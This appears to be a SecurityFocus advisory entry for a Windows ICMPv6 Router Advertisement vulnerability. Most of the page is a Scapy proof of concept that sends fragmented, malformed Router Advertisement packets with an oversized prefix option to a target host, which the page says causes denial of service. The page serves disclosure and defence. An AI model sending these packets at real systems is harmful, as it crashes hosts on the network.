Microsoft Windows ICMPv6 Router Advertisement Remote Code Execution Vulnerability

The following commands using the Scapy6 packet manipulation program can trigger this issue and cause a denial-of-service condition:

v6_dst = "<IPv6 address>"

mac_dst = "<Mac address>"

pkt = IPv6(dst=v6_dst, hlim=255) / IPv6ExtHdrFragment() / ICMPv6ND_RA() / ICMPv6NDOptPrefixInfo(len=255, prefixlen=64, prefix="2001::") / Raw(load='A'*2008)

l=fragment6(pkt, 1500)

for p in l:
sendp(Ether(dst=mac_dst)/p, iface="eth0")

Currently we are not aware of any working exploits. If you feel we are in error or if you are aware of more recent information, please mail us at:


Privacy Statement
Copyright 2010, SecurityFocus